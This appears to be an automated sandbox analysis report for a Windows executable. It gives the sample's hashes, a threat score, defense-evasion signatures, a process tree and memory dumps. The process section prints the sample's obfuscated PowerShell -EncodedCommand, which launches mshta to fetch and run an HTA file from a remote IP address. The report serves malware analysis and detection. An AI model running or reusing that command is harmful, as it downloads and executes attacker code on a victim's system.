Overview

overview

10

Static

static

3

file.exe

windows7-x64

6

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    05-11-2024 14:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    105KB

  • MD5

    edd1f792f4dcfaa2e3cc2cb30ab248e8

  • SHA1

    2510594e8f4ba919813be0362e9fd7f0620680da

  • SHA256

    7876f0415e0a2c190ea29756895ebff0c1251abf7aaf1061731b8346564ab571

  • SHA512

    036bb0b4afeebc2e24675dcbd1973b7a54c70d0a33655b86582a19bfd116a78ba09344aedce2c3718a4ecaf894cd5d496019a8247fd9b8646f0c0c4b5cb30bf5

  • SSDEEP

    384:AMjfVU+V4yg3d2xMGJn6BrfKNG99Sjvb99SjvWp:d7XCVMxylB9Sbh9Sb

Score
6/10
defense_evasion

Malware Config

Signatures

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand LgAgAFwAVwAqAFwAUwAqADIAXABtACoAaAA/AGEALgAqACAAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAyAC4ANwAxAC4AMQA4ADMAOgA4ADAAOAAxAC8AMAAvADMALgBoAHQAYQAnAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2708

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2708-4-0x000007FEF66DE000-0x000007FEF66DF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2708-6-0x0000000002710000-0x0000000002718000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2708-7-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-5-0x000000001B660000-0x000000001B942000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2708-8-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-9-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-10-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2708-11-0x000007FEF6420000-0x000007FEF6DBD000-memory.dmp

    Filesize

    9.6MB

    Download